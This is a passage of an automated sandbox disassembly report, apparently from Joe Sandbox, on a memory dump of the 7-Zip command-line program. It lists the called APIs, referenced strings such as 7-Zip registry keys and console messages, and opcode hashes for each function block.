                                                                • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                • Instruction Fuzzy Hash: 90212A67702A40C9CB29DF26E8913696360EB96FA9F294321DF3D1B7D8DF35C8468310
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: File$Create$CloseHandleTimefree
                                                                • String ID:
                                                                • API String ID: 234454789-0
                                                                • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                • Instruction ID: 1873b9235e501cb8835c8de4b21cd6a9ce89a4f00bfec4a5d2d15046e68e1765
                                                                • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                • Instruction Fuzzy Hash: 8C21C632204A8086D624DF26FD94B9A6A21F3957F8F544335EE75477E8CB39C9CAD700
                                                                APIs
                                                                  • Part of subcall function 0011B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,001382CA), ref: 0011B56F
                                                                  • Part of subcall function 0011B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0011B4AA
                                                                  • Part of subcall function 0011B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0011B4F8
                                                                • free.MSVCRT ref: 00138343
                                                                  • Part of subcall function 00113404: free.MSVCRT ref: 00113431
                                                                  • Part of subcall function 00113404: memmove.MSVCRT ref: 0011344C
                                                                  • Part of subcall function 00118624: free.MSVCRT ref: 001186A9
                                                                • free.MSVCRT ref: 0013832B
                                                                • free.MSVCRT ref: 00138336
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$QueryValue$Openmemmove
                                                                • String ID: 7z.dll$Software\7-zip
                                                                • API String ID: 2771487249-1558686312
                                                                • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                • Instruction ID: 49606305964ad25ee7ec850985265a100498b69b94ae102806fda73b520a051b
                                                                • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                • Instruction Fuzzy Hash: BE118A61348A4050CA24EB11E9513DE6721EBE6BE4F845331FD6E57B66DF38C68AC700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free
                                                                • String ID:
                                                                • API String ID: 3873070119-0
                                                                • Opcode ID: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                • Instruction ID: d7554c155b8eb2873425ad592334448acc623193dd42e7d1bfd4d26601f54076
                                                                • Opcode Fuzzy Hash: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                • Instruction Fuzzy Hash: 87112E7721494592DB20DF25E9403AA6330F799BA5F444231EFAE47AA4DF68C955C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryfree$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3252411863-0
                                                                • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                • Instruction ID: a9c5b9758ecf18723c8aaf340abfca6e468a198456c4f84de4563894d5d29791
                                                                • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                • Instruction Fuzzy Hash: 9801A726304A00C1DA38EB61EA843FD57219BD67F0F584330DAAD877A5DF29C9C68701
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                • Instruction ID: 1d038beffc40e43388ad4b86e2824751eb9b6407bfe3193e203c9e64ad26fede
                                                                • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                • Instruction Fuzzy Hash: ADF0176224650442CA1AFA22E4612AA5310AB9BF91F091572DB0E17321CF38C497C304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                • Instruction ID: 8b826e156fef0fe0aaeb2730abf3600b7fcb6c0c1920ab60f9b99122735071dd
                                                                • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                • Instruction Fuzzy Hash: FFE0F56261040491CB18FF76DCA20AC2324EBE7F887181271DF2E8B325CF30C8E28384
                                                                APIs
                                                                • free.MSVCRT ref: 001525EC
                                                                • fputs.MSVCRT ref: 00152636
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$freememset
                                                                • String ID: Name$Size
                                                                • API String ID: 2276422817-481755742
                                                                • Opcode ID: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                • Instruction ID: ac3829ceaff61bce2064aaa8d15ec0810c08a41f6b02c91f98e6ee6d072f5f92
                                                                • Opcode Fuzzy Hash: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                • Instruction Fuzzy Hash: 3C41C473224A84E2DB2ADF34E4547DE2360F755B59F885122EF7E46255EF78CA8AC300
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015BDCD
                                                                • fputs.MSVCRT ref: 0015BE0B
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$memset
                                                                • String ID: : Removing files after including to archive$Removing
                                                                • API String ID: 3543874852-1218467041
                                                                • Opcode ID: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                • Instruction ID: d3fb3a2b08dd6b32fba5737e0eca0156a82c12d63809bc7a166f5d3a3edf8929
                                                                • Opcode Fuzzy Hash: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                • Instruction Fuzzy Hash: D8314F72204A85D2DA68DB25E8853EEA360E750749F488432DBAF4A1A5DF7CD5CEC300
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015C4FD
                                                                • fputs.MSVCRT ref: 0015C50D
                                                                • free.MSVCRT ref: 0015C553
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$freememset
                                                                • String ID: :
                                                                • API String ID: 2276422817-3653984579
                                                                • Opcode ID: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                • Instruction ID: f708459c64da011f9c07e0232f4476eac91e516b36ae21b66164d0849ef568d0
                                                                • Opcode Fuzzy Hash: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                • Instruction Fuzzy Hash: 8E114262350A4191DA2CEF25D8513ED6320FB99BE5F484231EE3E47795DF38D4A9C384
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015B8EB
                                                                • free.MSVCRT ref: 0015B90A
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$freememset
                                                                • String ID: ERROR: $WARNING:
                                                                • API String ID: 2276422817-2114518728
                                                                • Opcode ID: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                • Instruction ID: 2ade7cae41d7c81996c3c3bc89dfd5d66af8dab8016b465bce92b0a43cce6153
                                                                • Opcode Fuzzy Hash: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                • Instruction Fuzzy Hash: 93115E22305A8081DA29EB22E8917EE6310B799BE5F484231EE7B0B391DF3CC4D9C304
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeavefputs
                                                                • String ID: ERROR:
                                                                • API String ID: 4171338575-977468659
                                                                • Opcode ID: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                • Instruction ID: c31090205832510725b265cde5ec48476e4b68f2cc8860eb6368b5c9752299c6
                                                                • Opcode Fuzzy Hash: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                • Instruction Fuzzy Hash: C7116072341D41D5DB1ADF35ED507E82321FB85B96F584235DE6E4B694CF388489C310
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015BC6C
                                                                • free.MSVCRT ref: 0015BC78
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$freememset
                                                                • String ID: Archive size: $Files read from disk
                                                                • API String ID: 2276422817-3736835528
                                                                • Opcode ID: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                • Instruction ID: f03ae48bf8e184c88dfee988496fa8cc5e459fc4f16ad9593b8531a9aab5188e
                                                                • Opcode Fuzzy Hash: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                • Instruction Fuzzy Hash: 9111516220494590CF24EB64E8913DD6731FBD57A8F845232EA6E475B9DF38C6DAC700
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: a$z
                                                                • API String ID: 0-4151050625
                                                                • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                • Instruction ID: 43ce956bde47c3228aa00a5a290ce95e4be2863e6f6826a89a62b641413a9ce4
                                                                • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                • Instruction Fuzzy Hash: 99018156F0107DC5EB2C7B19A8547F8A6529715B9EF8E4133CE8907750D33989F2E301
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: RtlGetVersion$ntdll.dll
                                                                • API String ID: 1646373207-1489217083
                                                                • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                • Instruction ID: ec348ff57d9a32417f6559ce7b978abacc92cd77ed53ecec0c290b9989f895f2
                                                                • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                • Instruction Fuzzy Hash: 8BF0A475212D44C6DF38DBE0F8843E96760EB88366F840439E64A46A50DB38C9CDCA02
                                                                APIs
                                                                • fputs.MSVCRT ref: 0015BACF
                                                                • fputs.MSVCRT ref: 0015BAFC
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 0011237E
                                                                  • Part of subcall function 00112320: fputs.MSVCRT ref: 001123B8
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 001123C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free
                                                                • String ID: Open archive: $StdOut
                                                                • API String ID: 3873070119-2401103298
                                                                • Opcode ID: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                • Instruction ID: 6a47ec78b1350ef45d1c30f76ebdba7d69df1ff940021782ad92ecadc78f3d83
                                                                • Opcode Fuzzy Hash: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                • Instruction Fuzzy Hash: 54F03AA5314C84C1DE459F26DA853A95322BB98FD5F48D432DD1E4B218DF29C49EC300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$fputc
                                                                • String ID: $:
                                                                • API String ID: 1185151155-4041779174
                                                                • Opcode ID: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                • Instruction ID: c995ea72024893f9f8ab9e40e3a55f870aa32fb6b1416c3974ab19320f7b61aa
                                                                • Opcode Fuzzy Hash: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                • Instruction Fuzzy Hash: 92E06DA6304A8481DB159B26E95439DA321FBA9FCDF488132EE8E0B719DF2CC149C711
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetLargePageMinimum$kernel32.dll
                                                                • API String ID: 1646373207-2515562745
                                                                • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                • Instruction ID: adbb5b476573fcfb4e3ec44e1d3c1fc1b953ad17d238e8f590cc7527d66676c8
                                                                • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                • Instruction Fuzzy Hash: 56E0B678766F01D1EE1ADB55FC953A82370AB89B06F88042D891E8B360FF3CC24AC340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ErrorLast
                                                                • String ID:
                                                                • API String ID: 408039514-0
                                                                • Opcode ID: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
                                                                • Instruction ID: cab4ec639a91ce1f15fa9f2cfc4df9c97c010f5a6b37068f4bd9c0491aa7f281
                                                                • Opcode Fuzzy Hash: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
                                                                • Instruction Fuzzy Hash: A5817C72319A4082CB28DF25D45076EB7B1F798BA4F544625EF9E43BA8EF38C995C700
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
                                                                • Instruction ID: 0d431e36183ca6c769f43f1b3c8142bb2c1891dcb6b3c13a17bd6706fe5c026d
                                                                • Opcode Fuzzy Hash: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
                                                                • Instruction Fuzzy Hash: 8541D6237157A09BCB24DE22F5402AD6760FB96BE4F485221EFAD07B59DF38C5A5C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
                                                                • Instruction ID: dd2606565a1fc46e3d58295ffb6228651dd236e7fe07f8bc85e3b8e29d804f2a
                                                                • Opcode Fuzzy Hash: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
                                                                • Instruction Fuzzy Hash: 6D41EA276086C096C720DA25E48029FAFB1F3E6798F180215FF9607B69C77ED099CB11
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
